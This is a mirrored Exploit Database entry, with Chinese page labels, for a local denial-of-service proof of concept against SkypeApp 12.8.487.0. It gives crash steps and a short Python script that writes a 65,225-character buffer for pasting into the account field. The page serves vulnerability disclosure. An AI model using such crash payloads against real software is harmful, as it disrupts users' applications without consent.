SkypeApp 12.8.487.0 – ‘Cuenta de Skype o Microsoft’ Denial of Service (PoC)

Exploit Database
32 阅读

作者： Luis Martínez

日期： 2018-08-24
类别：
- dos
平台：
- windows_x86-64
来源：https://www.exploit-db.com/exploits/45251/

# Exploit Title: SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-23
# Vendor Homepage: https://www.skype.com/es/home/
# Tested Version: 12.8.487.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python SkypeApp_12.8.487.0.py
# 2.- Open SkypeApp_12.8.487.0.txt and copy content to clipboard
# 3.- Open SkypeApp.exe
# 4.- Paste ClipBoard on "Cuenta de Skype o Microsoft"
# 5.- Siguiente
# 6.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 65225
f = open ("SkypeApp_12.8.487.0.txt", "w")
f.write(buffer)
f.close()

last Exploits
SkypeApp 12.8.487.0 – ‘Cuenta de Skype o Microsoft’ Denial of Service (PoC)的更多信息

Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow：
Anyburn 4.3 – ‘Convert image to file format’ Denial of Service：
NBMonitor 1.6.5.0 – ‘Key’ Denial of Service (PoC)：
FTPShell Client 6.53 – ‘Session name’ Local Buffer Overflow：
Apple macOS Sierra 10.12.1 – ‘IOFireWireFamily’ FireWire Port Denial of Service：
Sudo 1.8.25p – ‘pwfeedback’ Buffer Overflow (PoC)：
KMPlayer 3.7.0.109 – ‘.wav’ Crash (PoC)：
PHP 7.0.0 – Format String：